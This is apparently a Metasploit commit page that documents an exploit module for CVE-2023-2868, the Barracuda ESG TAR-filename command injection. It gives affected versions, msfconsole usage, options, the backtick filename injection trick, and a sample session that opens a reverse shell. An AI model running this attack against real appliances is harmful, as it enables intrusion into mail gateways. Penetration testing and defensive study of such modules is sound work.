Merge pull request #21033 from Alpenlol/barracuda-esg-cve-2023-2868
Add exploit for CVE-2023-2868 Barracuda ESG command injection
This commit is contained in:
jheysel-r7
@@ -0,0 +1,113 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits CVE-2023-2868, a command injection vulnerability in
|
||||
Barracuda Email Security Gateway (ESG) appliances running firmware versions
|
||||
prior to the May 2023 security patch.
|
||||
|
||||
The vulnerability exists in how the ESG processes TAR file attachments in
|
||||
incoming emails. When extracting TAR archives, filenames are passed directly
|
||||
to shell commands without proper sanitization. An attacker can craft a TAR
|
||||
file with a filename containing shell metacharacters (specifically backticks)
|
||||
to achieve remote command execution.
|
||||
|
||||
### Affected Versions
|
||||
|
||||
- Barracuda ESG firmware versions 5.1.3.001 through 9.2.0.006 (prior to May 2023 patch)
|
||||
- All ESG appliance models processing email with attachment scanning enabled
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/smtp/barracuda_esg_tarfile_rce`
|
||||
3. `set RHOSTS <target_ip>`
|
||||
4. `set MAILTO <target_email>`
|
||||
5. `set LHOST <your_ip>`
|
||||
6. `run`
|
||||
7. Wait 30-90 seconds for the ESG to process the email attachment
|
||||
|
||||
## Options
|
||||
|
||||
### MAILTO
|
||||
|
||||
The target email address that the ESG appliance is configured to receive mail for. This email will trigger the attachment processing.
|
||||
|
||||
### MAILFROM
|
||||
|
||||
The sender email address. Can be set to any valid email format. Default: `scanner@example.com`.
|
||||
|
||||
### SUBJECT
|
||||
|
||||
The email subject line. Default: `Quarterly Report`.
|
||||
|
||||
### BODY
|
||||
|
||||
Optional email body text. If not specified, a random alphanumeric string is generated.
|
||||
|
||||
### FILENAME
|
||||
|
||||
Optional TAR attachment filename. If not specified, a random filename with `.tar` extension is generated.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Barracuda ESG 9.2.0.001
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
|
||||
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.local
|
||||
MAILTO => admin@target.local
|
||||
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
|
||||
LHOST => 192.168.1.50
|
||||
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > check
|
||||
|
||||
[*] 192.168.1.100:25 - Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] 192.168.1.100:25 - Barracuda ESG detected in SMTP banner
|
||||
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run
|
||||
|
||||
[*] Generating malicious TAR with payload filename
|
||||
[*] Composing email with TAR attachment
|
||||
[*] Sending exploit email to admin@target.local via 192.168.1.100:25
|
||||
[+] Email sent successfully
|
||||
[*] Payload will execute when ESG processes the attachment
|
||||
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321)
|
||||
|
||||
id
|
||||
uid=604(scana) gid=604(scana) groups=604(scana)
|
||||
hostname
|
||||
barracuda300.lol.tst
|
||||
```
|
||||
|
||||
## Technical Details
|
||||
|
||||
### Exploit Mechanism
|
||||
|
||||
1. A malicious TAR archive is created with a filename in the format: `` '`COMMAND`' ``
|
||||
2. The TAR is attached to an email and sent to the target ESG via SMTP
|
||||
3. When the ESG processes the email attachment, it extracts the TAR
|
||||
4. The vulnerable code passes the filename to a shell command without sanitization
|
||||
5. The backticks trigger command substitution, executing the attacker's command
|
||||
|
||||
### Character Restrictions
|
||||
|
||||
The TAR filename cannot contain:
|
||||
- Single quotes (`'`) - breaks the outer quoting
|
||||
- Backticks (`` ` ``) - breaks the command substitution boundaries
|
||||
- Null bytes (`\x00`) - truncates the filename
|
||||
- Newlines (`\r\n`) - breaks TAR format
|
||||
|
||||
These are declared as `BadChars` in the module, so the framework will automatically filter incompatible payloads.
|
||||
|
||||
### Artifacts
|
||||
|
||||
This exploit creates the following artifacts on the target system:
|
||||
- Email and attachment in mail processing queue/logs
|
||||
- Process entries for shell and payload processes
|
||||
- Temporary files if using netcat payloads (e.g., mkfifo pipe in `/tmp/`)
|
||||
|
||||
## References
|
||||
|
||||
- [CVE-2023-2868](https://nvd.nist.gov/vuln/detail/CVE-2023-2868)
|
||||
- [Barracuda Security Advisory](https://www.barracuda.com/company/legal/esg-vulnerability)
|
||||
- [Mandiant Analysis](https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally)
|
||||
- [AttackerKB](https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868)
|
||||
Reference in New Issue
Block a user